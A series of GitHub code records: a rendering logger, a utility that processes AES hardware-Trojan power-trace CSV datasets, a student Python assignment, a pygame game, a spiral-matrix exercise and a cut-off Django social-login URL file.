cv2.cvtColor(content, cv2.COLOR_BGR2RGB)\n \n content = cv2.resize(content,(512,512)) \n if type == \"video\":\n if name not in self.loggers:\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n color = True\n if len(content.shape) == 2 or content.shape[2] == 1:\n color = False\n self.loggers[name] = cv2.VideoWriter(\n os.path.join(self.path, name.replace(\" \", \"_\") + \".mp4\"),\n fourcc, 60.0,\n (content.shape[1], content.shape[0]),\n color\n )\n writer = self.loggers[name]\n writer.write(content)\n \n if self.show:\n try:\n content = cv2.resize(content,(512,512))\n cv2.imshow(name,content)\n cv2.waitKey(1)\n except:\n print(\"visualization failed. if you don't have a screen, don't turn show option on\")\n if len(content.shape)==2:\n content = content[...,None]\n \n #self.core_logger.add_image(name, content, dataformats = \"HWC\", global_step = step)\n \n def save_config(self, task):\n f = open(os.path.join(self.path, \"config.py\"), 'w')\n f.write(str(task))\n f.close()\n \n def save_file(self, file):\n copyfile(file, os.path.join(self.path, file.split(\"/\")[-1]))\n \n \n def save_txt(self, name, arr):\n np.savetxt(os.path.join(self.path,name),arr)\n \n def save_npy(self, name, arr):\n np.save(os.path.join(self.path,name),arr)\n \n def save_img(self, name, img, flip=True):\n img = img.astype(np.float32)\n img = img[...,:3]\n if img.shape[-1]==3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if flip:\n img = cv2.flip(img, 0)\n \n img = (np.clip(img,0,1)*255).astype(np.uint8)\n img = cv2.resize(img,(512,512),interpolation=cv2.INTER_NEAREST)\n cv2.imwrite(os.path.join(self.path,name),img)\n\n def step(self, stop = False):\n if self.debug or stop:\n cv2.waitKey(0)\n else:\n cv2.waitKey(1)\n return\n \n def mark(self):\n open(os.path.join(self.path, \"success\"), 'w')\n \n def clean(self):\n for k, v in self.loggers.items():\n v.release()\n cv2.destroyAllWindows()\n self.loggers={}\n \n def exit(self):\n print(\"exit\")\n self.core_logger.close()\n self.clean()\n for k,v in self.metrics.items():\n np.savetxt(os.path.join(self.path,k+\".txt\"),np.array(v))\n\n def show_metric(self):\n for k,v in self.metrics.items():\n print(k,np.average(np.array(v)))\n \n def ret_metric(self):\n return self.metrics\n \n def add_scalar(self, label: str, x, y):\n self.core_logger.add_scalar(label, x, y)\n\n def add_metric(self, label, x):\n if label not in self.metrics:\n self.metrics[label]=[]\n self.metrics[label].append(x)\n\n def add_video(self, label: str, vid: torch.Tensor):\n \"\"\" The shape of vid should be (T, H, W, 3)\n \"\"\"\n self.core_logger.add_video(label, vid.reshape([1, *vid.size()]))\n\n def add_mesh(self, label: str, vertice, color, face, step):\n \"\"\" The shape of these tensors should be (N, 3)\n \"\"\"\n self.core_logger.add_mesh(\n label,\n vertice.reshape([1, *vertice.size()]) if vertice is not None else None,\n color.reshape([1, *color.size()]) if color is not None else None,\n face.reshape([1, *face.size()]) if face is not None else None,\n global_step = step\n )\n \n def save_scene(self,scene,name):\n path = os.path.join(self.path,name)\n os.makedirs(path,exist_ok=True)\n #return\n for id,meshinfo in enumerate(scene[\"meshes\"]):\n verts,faces = meshinfo[\"model\"].get_mesh_verts_faces(0)\n try:\n verts_uv = meshinfo[\"model\"].textures.verts_uvs_list()[0]\n faces_uv = meshinfo[\"model\"].textures.faces_uvs_list()[0]\n tex = meshinfo[\"model\"].textures.maps_padded()[0]\n save_obj(os.path.join(path,str(id)+\".obj\"),verts,faces,verts_uvs=verts_uv,faces_uvs=faces_uv,texture_map=tex)\n except:\n print(\"no texture save\")\n save_obj(os.path.join(path,str(id)+\".obj\"),verts,faces)\n\n\n\nLogger = Loggers()","repo_name":"jkxing/DROT","sub_path":"experiments/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":5757,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"37"} +{"seq_id":"19531703616","text":"import os, platform,csv,re\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pathlib import Path\r\n\r\ndef _fix_the_path_for_the_os(d):\r\n if platform.system() != 'Windows':\r\n if '/mnt/NAS/Members/root/' not in d:\r\n d = '/mnt/NAS/Members/root/' + d\r\n else:\r\n if 'Y:/' not in d:\r\n d = 'Y:/' + d\r\n return d\r\n\r\n\r\ndef _get_immediate_subdirectories(a_dir):\r\n return [name for name in os.listdir(a_dir)\r\n if os.path.isdir(os.path.join(a_dir, name))]\r\n\r\n\r\ndef _get_immediate_subdirectories_and_set_of_types(a_dir):\r\n list_of_folders = _get_immediate_subdirectories(a_dir)\r\n if 'not valid' in list_of_folders:\r\n list_of_folders.remove('not valid')\r\n types = []\r\n for f in list_of_folders:\r\n types.append(f.split('_')[0])\r\n\r\n types = set(types)\r\n return list_of_folders, types\r\n\r\n\r\ndef _atoi(text):\r\n return int(text) if text.isdigit() else text\r\n\r\n\r\ndef _natural_keys(text):\r\n return [_atoi(c) for c in re.split(r'(\\d+)', text) ]\r\n\r\n\r\ndef _get_csv_files_sorted_list(a_dir):\r\n l = [a_dir + name for name in os.listdir(a_dir) if name.endswith('.csv')]\r\n l.sort(key=_natural_keys)\r\n return l\r\n\r\n\r\ndef get_list_of_files_HT(dir2bms_folder='HT_Data/AES_withTrojan_Set1/',\r\n name_bms=['AES-T400'], folder_numbers=[1], with_anomaly_data= False):\r\n dir2bms_folder = _fix_the_path_for_the_os(dir2bms_folder)\r\n dirs_to_files = []\r\n for name_bm in name_bms:\r\n list_of_folders, types = _get_immediate_subdirectories_and_set_of_types(dir2bms_folder + name_bm)\r\n for className in types:\r\n if (not with_anomaly_data and 'Disabled' in className)or (with_anomaly_data and 'Triggered' in className):\r\n for folder_number in folder_numbers:\r\n folder_name = className + '_' + str(folder_number)\r\n dir2data = dir2bms_folder + name_bm + '/' + folder_name + '/' + folder_name + '/'\r\n print(dir2data)\r\n sample_names = _get_csv_files_sorted_list(dir2data)\r\n for sample_name in sample_names:\r\n dirs_to_files.append(sample_name)\r\n\r\n return dirs_to_files\r\n\r\n\r\n\r\ndef INITIALIZE(func):\r\n setattr(func,\"sample_number\",0)\r\n setattr(func,\"second\",0)\r\n setattr(func,\"minute\",0)\r\n setattr(func,\"hour\",0)\r\n setattr(func,\"day\",1)\r\n setattr(func,\"month\",1)\r\n setattr(func,\"year\",2019)\r\n return func\r\n\r\n\"\"\"\r\nmy_clock () is tick based clock, with every tick it increments the sample_number varible and so on\r\n\"\"\"\r\n@INITIALIZE\r\ndef my_clock():\r\n\r\n month_names = ['January','February','March','April','May','June','July','August','September','October','November','December']\r\n month_days = [31,27,31,30,31,30,31,31,30,31,30,31]\r\n\r\n my_clock.sample_number = my_clock.sample_number + 1\r\n #print(my_clock.sample_number)\r\n if my_clock.sample_number == 1:\r\n my_clock.sample_number = 0\r\n my_clock.second = my_clock.second + 1\r\n #print('second',my_clock.second)\r\n\r\n if my_clock.second == 60:\r\n my_clock.second = 0\r\n my_clock.minute = my_clock.minute + 1\r\n #print('minute',my_clock.minute)\r\n\r\n if my_clock.minute == 60:\r\n my_clock.minute = 0\r\n my_clock.hour = my_clock.hour + 1\r\n print('hour',my_clock.hour)\r\n\r\n if my_clock.hour == 24:\r\n my_clock.hour = 0\r\n my_clock.day = my_clock.day + 1\r\n print('day',my_clock.day)\r\n\r\n if (my_clock.day == (month_days [my_clock.month-1]+1)):\r\n my_clock.day = 1\r\n my_clock.month = my_clock.month + 1\r\n print('month',my_clock.month)\r\n #exit()\r\n\r\n if (my_clock.month == 13):\r\n my_clock.month = 1\r\n my_clock.year = my_clock.year + 1\r\n print('year',my_clock.year)\r\n\r\n str_year = str(my_clock.year)\r\n\r\n if my_clock.month < 10:\r\n str_month = '0'+str(my_clock.month)\r\n elif my_clock.month >= 10:\r\n str_month = str(my_clock.month)\r\n\r\n if my_clock.day < 10:\r\n str_day = '0'+str(my_clock.day)\r\n elif my_clock.day >= 10:\r\n str_day = str(my_clock.day)\r\n\r\n if my_clock.hour < 10:\r\n str_hour = '0'+str(my_clock.hour)\r\n elif my_clock.hour >= 10:\r\n str_hour = str(my_clock.hour)\r\n\r\n if my_clock.minute < 10:\r\n str_minute = '0'+str(my_clock.minute)\r\n elif my_clock.minute >= 10:\r\n str_minute = str(my_clock.minute)\r\n\r\n if my_clock.second < 10:\r\n str_second = '0'+str(my_clock.second)\r\n elif my_clock.second >= 10:\r\n str_second = str(my_clock.second)\r\n\r\n return str_month + '/' + str_day + '/' + str_year + ' ' + str_hour + ':' + str_minute + ':' + str_second\r\n\r\n\r\ndef _merge(start_range=101, sample_no=4, output_file_name='\"./combined_HT-free.csv\"',\r\n dir2bms_folder='HT_Data/AES_withTrojan_Set1/',\r\n name_bms=['AES-T400'], folder_numbers=[1], with_anomaly_data=False):\r\n file_names = get_list_of_files_HT(dir2bms_folder,name_bms, folder_numbers, with_anomaly_data)\r\n file_names = file_names[start_range:start_range + sample_no]\r\n print(file_names)\r\n for file_name in file_names:\r\n with open(file_name) as original_file:\r\n original_file_reader = csv.reader(original_file, delimiter=',')\r\n with open(output_file_name,'a',newline='') as new_file:\r\n writer = csv.writer(new_file, delimiter=',')\r\n for row in original_file_reader:\r\n writer.writerow([float(row[0])])\r\n\r\n\r\ndef add_timestamp_csv(input_file_name, output_file_name):\r\n with open(input_file_name) as old_file:\r\n old_file_object = csv.reader(old_file, delimiter=',')\r\n add_row=['timestamp','value']\r\n with open(output_file_name,'w',newline='') as new_file:\r\n new_file_object = csv.writer(new_file, delimiter=',')\r\n new_file_object.writerow(add_row)\r\n time = '01/01/2019 00:00:00'\r\n tick = 0\r\n #row_number = 0\r\n for row in old_file_object:\r\n if 'timestamp' not in row:\r\n time = my_clock()\r\n add_row = [time, row[0]]\r\n new_file_object.writerow(add_row)\r\n\r\n\r\ndef merge_samples(dir2bms_folder,name_bms,\r\n uninfected_start_range=1,uninfected_samples_no=10, infected_start_range=1,infected_samples_no=10,\r\n combined_file_name='./combined_HT.csv',\r\n ht_free_file_name=\"./combined_HT-free.csv\",\r\n ht_infected_file_name = \"./combined_HT-infected.csv\",\r\n two_seperate_files=True,\r\n folder_numbers=[1]):\r\n\r\n if not two_seperate_files:\r\n ht_free_file_name, ht_infected_file_name = combined_file_name, combined_file_name\r\n\r\n for output_file_name in [combined_file_name,ht_free_file_name,ht_infected_file_name]:\r\n try:\r\n os.remove(output_file_name)\r\n print(output_file_name+' DELETED')\r\n except:\r\n print(output_file_name+' NOT PRESENT')\r\n\r\n # merge_uninfected_csv\r\n _merge(start_range=uninfected_start_range, sample_no=uninfected_samples_no, output_file_name=ht_free_file_name,\r\n with_anomaly_data=False,dir2bms_folder=dir2bms_folder, name_bms=name_bms, folder_numbers=folder_numbers)\r\n # merge_infected_csv\r\n _merge(start_range=infected_start_range, sample_no=infected_samples_no, output_file_name=ht_infected_file_name,\r\n with_anomaly_data=True,dir2bms_folder=dir2bms_folder, name_bms=name_bms, folder_numbers=folder_numbers)\r\n\r\n for file_name in set([ht_free_file_name,ht_infected_file_name]):\r\n add_timestamp_csv(file_name,'tmp.csv')\r\n os.remove(file_name)\r\n os.rename('tmp.csv',file_name)\r\n\r\n\r\ndef _add_noise_single_file(input_file,output_file, mu, sigma):\r\n clean_signal = pd.read_csv(input_file)\r\n noise = np.random.normal(mu, sigma, clean_signal.shape)\r\n noisy_signal = clean_signal + noise\r\n noisy_signal.to_csv(output_file,header= False, index= False)\r\n\r\n\r\ndef add_noise(dir2bms_folder= 'HT_Data/AES_withTrojan_Set1/',\r\n output_folder='HT_Data/AES_withTrojan_Set5/', name_bms=['AES-T400'],\r\n number_of_samples =1000,\r\n mu = 0, sigma = 0.1, do_not_add_mu_sigma_to_name= False,\r\n folder_numbers=[1]):\r\n\r\n output_folder = _fix_the_path_for_the_os(output_folder)\r\n for folder_number in folder_numbers:\r\n for name_bm in name_bms:\r\n if do_not_add_mu_sigma_to_name:\r\n output_bm_folder = output_folder + name_bm.split('_')[0] + '_' + str(number_of_samples) + 'p' + '/'\r\n else:\r\n output_bm_folder = output_folder + name_bm.split('_')[0] + '_mu_'+str(mu) + '_sigma_'+str(sigma) +'_'+str(number_of_samples) + 'p' + '/'\r\n\r\n\r\n # For the Disabled folder\r\n if os.path.isdir(output_bm_folder):\r\n print(output_bm_folder, 'exist')\r\n continue\r\n file_names = get_list_of_files_HT(dir2bms_folder,name_bms =[name_bm], folder_numbers=folder_numbers,\r\n with_anomaly_data = False)\r\n file_names = file_names [0:number_of_samples]\r\n inner_folder_name = name_bm.split('_')[0]+'+TrojanDisabled_'+str(folder_number)\r\n output_folder_final = output_bm_folder +inner_folder_name+'/'+inner_folder_name+'/'\r\n path = Path(output_folder_final)\r\n path.mkdir(parents=True, exist_ok=True)\r\n print('Output folder: ',path)\r\n for input_file in file_names:\r\n output_file= output_folder_final +input_file.split('/')[-1]\r\n _add_noise_single_file(input_file,output_file,mu,sigma)\r\n\r\n # For the Triggered folder\r\n file_names = get_list_of_files_HT(dir2bms_folder,name_bms =[name_bm], folder_numbers=folder_numbers,\r\n with_anomaly_data = True)\r\n file_names = file_names[0:number_of_samples]\r\n inner_folder_name = name_bm.split('_')[0]+'+TrojanTriggered_'+str(folder_number)\r\n output_folder_final = output_bm_folder+inner_folder_name+'/'+inner_folder_name+'/'\r\n path = Path(output_folder_final)\r\n path.mkdir(parents=True, exist_ok=True)\r\n for input_file in file_names:\r\n output_file= output_folder_final +input_file.split('/')[-1]\r\n _add_noise_single_file(input_file,output_file,mu,sigma)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n dir2bms_folder = 'HT_Data/AES_withTrojan_Set2/'\r\n output_folder = 'HT_Data/AES_withTrojan_Set11/'\r\n\r\n dataset_name = 'AES-T500'\r\n dataset_names = [dataset_name]\r\n #\r\n # dataset_names = ['AES-T400', 'AES-T500', 'AES-T600', 'AES-T700', 'AES-T800',\r\n # 'AES-T1000', 'AES-T1100', 'AES-T1300', 'AES-T1400',\r\n # 'AES-T1600','AES-T1800', 'AES-T2000']\r\n\r\n # dataset_names = ['AES-T800+Temp25','AES-T800+Temp35','AES-T800+Temp45','AES-T800+Temp55','AES-T800+Temp65',\r\n # 'AES-T800+Temp75','AES-T800+Temp85']\r\n\r\n # for mu in [0,5.25,5.5,5.75,6,6.25,6.5,6.75,7,7.25,7.5,7.75,8,8.25,8.5,8.75,9,9.25,9.5,9.75,10]:\r\n # for sigma in [10,15,20,5,25,0, 0.2, 0.4, 0.6, 0.8, 10]:\r\n # for sigma in [10, 15, 20, 5, 25, 0, 0.2, 0.4, 0.6, 0.8,1,2,3,4,5,6,7,8,9,10]:\r\n # for sigma in [0, 0.2, 0.4, 0.6, 0.8,1]:\r\n\r\n dataset_names = ['AES-T700+SQRT2bits_1000p','AES-T700+SQRT4bits_1000p','AES-T700+SQRT8bits_1000p',\r\n 'AES-T700+SQRT16bits_1000p','AES-T700+SQRT32bits_1000p','AES-T700+SQRT64bits_1000p',\r\n 'AES-T700+SQRT128bits_1000p','AES-T700+SQRT256bits_1000p']\r\n add_noise(dir2bms_folder=dir2bms_folder,\r\n output_folder=output_folder, name_bms=dataset_names, number_of_samples =1000,\r\n mu=0, sigma=0, do_not_add_mu_sigma_to_name = True,\r\n folder_numbers=[1])\r\n\r\n # for mu in [0,0.4,0.8,1.2,1.6]:\r\n # for sigma in [0,0.4,0.8,1.2,1.6]:\r\n # add_noise(dir2bms_folder=dir2bms_folder,\r\n # output_folder=output_folder, name_bms=dataset_names, number_of_samples =1000,\r\n # mu=mu, sigma=sigma, do_not_add_mu_sigma_to_name = False,\r\n # folder_numbers=[1])\r\n #\r\n # for mu in [0,0.4,0.8,1.2,1.6,0.2,0.6,1,1.4,1.8,2,2.4,2.8,3.2,3.6,4]:\r\n # for sigma in [0,0.4,0.8,1.2,1.6,0.2,0.6,1,1.4,1.8,2,2.4,2.8,3.2,3.6,4]:\r\n # add_noise(dir2bms_folder=dir2bms_folder,\r\n # output_folder=output_folder, name_bms=dataset_names, number_of_samples =1000,\r\n # mu=mu, sigma=sigma, do_not_add_mu_sigma_to_name = False,\r\n # folder_numbers=[1])\r\n\r\n # for mu in [0]:\r\n # for sigma in [0,1,2,3,4,5,6,7,8,9,10,15,20,25]: # 1.25, 1.5,1.75, 2, 2.25, 2.5,2.75,3, 3.25, 3.5,3.75,4,4.25,4.5,\r\n # add_noise(dir2bms_folder=dir2bms_folder,\r\n # output_folder=output_folder, name_bms=dataset_names, number_of_samples =1000,\r\n # mu=mu, sigma=sigma,\r\n # folder_numbers=[1])\r\n #\r\n # for mu in [0,1,2,3,4,5,6,7,8,9,10,15,20,25]:\r\n # for sigma in [0]: # 1.25, 1.5,1.75, 2, 2.25, 2.5,2.75,3, 3.25, 3.5,3.75,4,4.25,4.5,\r\n # add_noise(dir2bms_folder=dir2bms_folder,\r\n # output_folder=output_folder, name_bms=dataset_names, number_of_samples =1000,\r\n # mu=mu, sigma=sigma,\r\n # folder_numbers=[1])\r\n\r\n # merge_samples(dir2bms_folder, name_bms=dataset_names,\r\n # uninfected_start_range=1, uninfected_samples_no=10, infected_start_range=1,infected_samples_no=3,\r\n # ht_free_file_name=\"./combined_HT-free.csv\",\r\n # ht_infected_file_name=\"./combined_HT-infected.csv\",\r\n # two_seperate_files=False)\r\n\r\n\r\n # add_noise()\r\n\r\n","repo_name":"AICPS/HTnet","sub_path":"utils/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":14064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31310382318","text":"\n\n# Assignment 1\n# Name: Roni Jack Vituli\n\n'''\nAssignment #1\nRoni Jack Vituli \n'''\n\n\n#Question 1\n\ndef Xnor(a,b):\n '''\n Question 1\n a function that recives two parameters of the same type and apply xnor\n parameters - a and b\n Returns true or false \n '''\n if a == b:\n return True\n return False\n\ndef Digit_len(num):\n '''\n a function to help us in the assignment\n '''\n count = 0\n while(num != 0):\n num //= 10\n count += 1\n return count\n\n\ndef even_or_odd(x):\n '''a function that helped us in question2'''\n if(x % 2 == 0):\n return \"even\"\n return \"odd\"\n\n\n#Question 2\n\ndef Digits(num):\n '''\n Question 2\n Function does as in the instructions\n Parameters - num\n Return value as in the instructions\n\t'''\n if( num > 0 and Digit_len(num) < 6):\n len = Digit_len(num)\n print(len)\n sum = 0\n str = \"\"\n if (len == 1):\n sum = num\n str = \"One\"\n elif(len == 2):\n sum = num//10 + num%10\n str = \"Two\"\n elif(len == 3):\n sum = num//100 + num%10\n str = \"Three\"\n elif(len == 4):\n sum = (num//10)%10 + (num//100)%10\n str = \"Four\"\n elif(len == 5):\n sum = (num//100)%10\n str = \"Five\"\n print('{0} digits - {1}'.format(str,even_or_odd(sum)))\n\n else:\n print(\"ERROR!\")\n\n\n#Question 3\ndef GoodOrder(num):\n '''\n Question 3 \n a boolean function that returns true if all the digits of the number are odd or even and false if not\n Parameters - num(the number given)\n Return value - true or false\n'''\n if(num >= 0):\n if(num > 9):\n state = even_or_odd(num)\n num //= 10\n while(num != 0):\n new_state = even_or_odd(num)\n if (state != new_state):\n return False\n num //= 10\n return True\n print('Bad Number')\n return False\n\n#Question 4\ndef Figure(num):\n '''\n Question 4\n prints a triangle as orderd we checked for repetitiveness of a rule and based on that we built the function\n Parameters -num:chooses the size of the triangle\n no Return value.\n '''\n for i in range(0,num-1):\n for j in range(0, num*2+1):\n if i + j == num - 1 or j - i == num - 1:\n print(i+1, end = '')\n else:\n print(' ', end = '')\n\n print('')\n for i in range(num,0,-1):\n print(i , end = '')\n for i in range(2, num+1):\n print(i , end = '')\n\n#Question 5\ndef max(num):\n\n '''\n Question 5\n help function for question 5 its a recursive function to return the max digit\n Parameters -num \n Return value max digit from the given number\n '''\n \n if(Recu_len(num) == 1):\n return num\n digit = num % 10\n num //= 10\n if(digit > num%10):\n num //=10\n num = num*10 + digit\n return max(num)\n\ndef Recu_len(num):\n\n '''\n help function for question 5 a recursive function to check a length of a number\n '''\n \n if(num == 0):\n return 0\n return 1 + Recu_len(num//10)\n\ndef weight(num):\n return max(num) + Recu_len(num)\n\n#Question number 6\n\ndef IsPrimary(num, i = 2):\n\n '''\n Question 6\n finds if a number is a prime number with recurssion\n Parameters - num. i is for checking all the numbers\n Return value - true or false\n '''\n \n if(num == i or num == 1):\n return True\n elif(num % i == 0):\n return False\n return IsPrimary(num, i+1)\n\n\n\n\n#Question number 7\ndef reduce(num):\n\n '''\n Question 7\n reduces zeroes with recurssion\n Parameters - num\n Return value - the number without zeroes\n '''\n \n if(num == 0):\n return 0\n if(num > 0):\n if (num % 10 == 0):\n return reduce(num // 10)\n return num % 10 + reduce(num // 10) * 10\n else:\n if (num % 10 == 0):\n return reduce(num // 10)\n return (10 - num % 10)*(-1) - reduce((num // 10) + 1) * 10 * (-1)\n\n\n\n#Question number 8\n\ndef Pascal(n,m):\n\n '''\n\tQuestion 8\n the answer was based on the pascal triangle where each element depends on two elemnts before him\n\tthe function checks how much ways to choose m elements from a set with a size of n\n Parameters - n: size of set, m - number of elements\n Return value - how much ways to choose m elements from a set with a size of n\n '''\n \n if( m > n or n < 0 or m < 0):\n return -1\n\n if n == m or m == 0:\n return 1\n return Pascal(n-1, m-1) + Pascal(n-1, m)\n\n","repo_name":"RoniJackVituli/EducationProjects","sub_path":"Python/Assignment 1/Ass1.py","file_name":"Ass1.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"29000239997","text":"# test011.py\nimport sys\nimport pygame\nimport time\nimport random\nimport math\nfrom my_colours import *\nfrom game_over import *\nfrom my_player import *\nfrom my_enemy import *\nfrom my_score import *\nfrom my_mechanics import *\nfrom my_bullet import *\nfrom my_movement import *\nfrom introScreen import *\nfrom level import *\nfrom my_boss import *\n# import pygame.sprite as sprite\n\n#to initialize the pygame module\npygame.init()\n\n# To start the screen at 600X800 resolution.\nscreen = pygame.display.set_mode((800, 600))\n\n#background Image\nbackground = pygame.image.load('evening_1.jpg').convert()\n\n#Title and Icon\npygame.display.set_caption(\"Corona Strike 0.0.1\")\nicon = pygame.image.load('Code_Maniac.jpg')\npygame.display.set_icon(icon)\n\npygame.mixer.music.load('background.wav')\npygame.mixer.music.play(-1)\n\n\nstarting = start_game()\nrun = starting.game_intro(screen)\nif run == False:\n\tsys.exit()\n\n# need level selecting page\nmy_level = select_level()\nmode = my_level.level_intro(screen)\nprint(\"your mode is \", mode)\n#main game-loop\n\nrunning = True\n\np = my_player()\nc = my_corona_1(mode)\nfor i in range(5):\n\tc.spawn_corona(i)\n\ng = game_over()\nb = my_bullet()\ns = info_game()\nm = mechanics()\nkey = movement()\nclock = pygame.time.Clock()\n#rb = red_boss()\n\nhit = 0\nwhile running:\n\tdt = clock.tick_busy_loop(30)\n\t# Background color\n\tscreen.fill((0,0,0))\n\t# Background Image\n\tscreen.blit(background, (0,0))\n\tp.player(p.playerX, p.playerY, screen)\n\n\n\tc.corona_1(c.corona_1X, c.corona_1Y, screen)\n\t# rb.boss_draw(screen)\n\ts.my_score(screen)\n\ts.my_fps(dt, screen)\n\n\trunning = key.move(p, b, dt, screen)\n\n\t# checking game finish\n\tdead = 0\n\n\tfor i in range(5):\n\t\t\t\t\t\t\n\t\tif not c.alive[i]:\n\t\t\t\tdead += 1\n\t\t\t\tcontinue\n\t\tfor j in range(i + 1, 5):\n\t\t\tif not c.alive[j]:\n\t\t\t\tcontinue\n\t\t\telif c.corona_1Y[i] == c.corona_1Y[j]:\n\t\t\t\tif abs(c.corona_1X[i] - c.corona_1X[j]) < 48:\n\t\t\t\t# if m.isCollision(c.corona_1X[i], \n\t\t\t\t# \t\t\t\tc.corona_1Y[i], \n\t\t\t\t# \t\t\t\tc.corona_1X[j], \n\t\t\t\t# \t\t\t\tc.corona_1Y[j]\n\t\t\t\t# \t\t\t\t): \n\t\t\t\t\tc.corona_movX[i] = -c.corona_movX[i]\n\t\t\t\t\tc.corona_movX[j] = -c.corona_movX[j]\n\t\t\t\t\tif c.corona_movX[i] > 0:\n\t\t\t\t\t\tc.corona_1X[j] -= (48 - abs(c.corona_1X[i] - c.corona_1X[j]))/2\n\t\t\t\t\t\tc.corona_1X[i] += (48 - abs(c.corona_1X[i] - c.corona_1X[j]))/2\n\t\t\t\t\t\tc.corona_1_Img[j] = c.corona_1_Img_left[j]\n\t\t\t\t\t\tc.corona_1_Img[i] = c.corona_1_Img_right[i]\n\t\t\t\t\telse:\n\t\t\t\t\t\tc.corona_1X[j] += (48 - abs(c.corona_1X[i] - c.corona_1X[j]))/2\n\t\t\t\t\t\tc.corona_1X[i] -= (48 - abs(c.corona_1X[i] - c.corona_1X[j]))/2\n\t\t\t\t\t\tc.corona_1_Img[j] = c.corona_1_Img_right[j]\n\t\t\t\t\t\tc.corona_1_Img[i] = c.corona_1_Img_left[i]\n\t\t\t\t\t\t\n\t\tif m.isCollision(c.corona_1X[i], c.corona_1Y[i], b.bulletX, b.bulletY):\n\t\t\texplosion_sound = pygame.mixer.Sound('explosion.wav')\n\t\t\texplosion_sound.play()\n\t\t\tb.bullet_state = 'ready'\n\t\t\tb.bulletY = 800\n\t\t\tif mode == 5:\n\t\t\t\tc.spawn_corona(i)\n\t\t\t\ts.score += 1\n\t\t\telse:\n\t\t\t\tc.health[i] -= 1\n\t\t\t\tif c.health[i] == 0: \n\t\t\t\t\tc.alive[i] = False\n\t\t\t\t\ts.score += 1\n\t\t\tif c.corona_movX[i] < 0:\n\t\t\t\tc.corona_1_Img[i] = c.corona_1_Img_left[i]\n\t\t\t# print(s.score)\n\t\tif m.isCollision(c.corona_1X[i], c.corona_1Y[i], p.playerX, p.playerY):\n\t\t\trunning = False\n\t\t\t\t\n\tif dead == 5:\n\t\tg.win_game(screen)\n\t\tscreen.blit(background, (0,0))\n\n\t\tpygame.display.update()\n\t\trunning = False\n\n\tif not mode == 5:\n\t\tfor i in range(5):\n\t\t\tc.corona_1_Img_left[i] = pygame.image.load(c.Img_left[mode - c.health[i]])\n\t\t\tc.corona_1_Img_right[i] = pygame.image.load(c.Img_right[mode - c.health[i]])\n\n\tc.check_corona_1(dt)\n\n\t# boss collision\n\t#distance_boss = math.hypot(rb.bossX - b.bulletX, rb.bossY - b.bulletY)\n\t#if rb.health == 3:\n\t#\tif distance_boss < 120:\n\t#\t\thit = 1\n\t# elif rb.health == 2:\n\t# \tif distance_boss < 90:\n\t# \t\thit = 1\n\t# elif rb.health == 1:\n\t# \tif distance_boss < 75:\n\t# \t\thit = 1\n\t# if hit == 1:\n\t# \tb.bullet_state = 'ready'\n\t# \tb.bulletY = 800\n\t# \trb.health -= 1\n\t# \texplosion_sound = pygame.mixer.Sound('explosion.wav')\n\t# \texplosion_sound.play()\n\t# \thit = 0\n\n\t# if rb.health <= 0:\n\t# \texplosion_sound = pygame.mixer.Sound('explosion.wav')\n\t# \texplosion_sound.play()\n\t# \trunning = False\n\t\n\tb.check_bullet(b.bullet_state, b.bulletX, b.bulletY, screen, dt)\n\tp.check_playerX(p.playerX, p.player_movX)\n\tp.check_playerY(p.playerY)\n\t\n\tif b.bulletY <= 0:\n\t\tb.bullet_state = 'ready'\n\n\tif running == False:\n\t\tg.game_over_text(screen)\n\n\tpygame.display.update()\n","repo_name":"PrajjwalDatir/CoronaStrike","sub_path":"test011.py","file_name":"test011.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"42087237852","text":"n = int(input())\ntarget = int(input())\n\ndx = [-1, 0, 1, 0] # 상 우 하 좌\ndy = [0, 1, 0, -1]\n\nif n%2 == 1:\n x, y = n//2, n//2\nelse:\n x, y = n//2, n//2 - 1\n\ngraph = [[0] * n for _ in range(n)]\ngraph[x][y] = 1\n\ncnt = 2 # 방향 꺾��\ndir = 0 # 상하좌우\nnext_num = 2 # 다음 숫자\n\nwhile True:\n for _ in range(cnt-1):\n nx, ny = x + dx[dir], y + dy[dir]\n graph[nx][ny] = next_num\n next_num += 1\n\n if next_num == n**2 + 1:\n break\n x, y = nx, ny\n\n if next_num == n**2 + 1:\n break\n\n dir = (dir+1)%4\n if dir == 0 or dir == 2:\n cnt += 1\n\nfor i in graph:\n print(*i)\n\nfor i in range(n):\n for j in range(n):\n if graph[i][j] == target:\n print(i+1, j+1)\n\n\n","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution608.py","file_name":"solution608.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21393834600","text":"from django.conf.urls import include, url\nfrom rest_social.social.provider import (\n FacebookLogin,\n FacebookConnect,\n GoogleLogin,\n GoogleConnect,\n GitHubLogin,\n GitHubConnect\n)\nfrom rest_auth.registration.views import (\n SocialAccountListView,\n SocialAccountDisconnectView\n)\n\n\nurlpatterns = [\n url(r'^social/facebook/$',\n FacebookLogin.as_view(),\n name='fb_login'),\n url(r'^social/google/$',\n GoogleLogin.as_view(),\n name='google_login'),\n url(r'^social/github/$',\n GitHubLogin.as_view(),\n name='github_login'),\n url(r'^social/facebook/connect/$',\n FacebookConnect.as_view(),\n name='fb_connect'),\n url(r'^social/google/connect/$',\n GoogleConnect.as_view(),\n name='google_connect'),\n url(r'^social/github/connect/$',\n GitHubConnect.as_view(),\n name='github_connect'),\n url(\n r'^social/socialaccounts/$',\n SocialAccountListView.as_view(),\n name='social_account_list'\n ),\n url(\n r'^social/socialaccounts/(?P\\d+)/disconnect/$',\n SocialAccountDisconnectView.as_view(),\n name='social_account_disconnect'\n 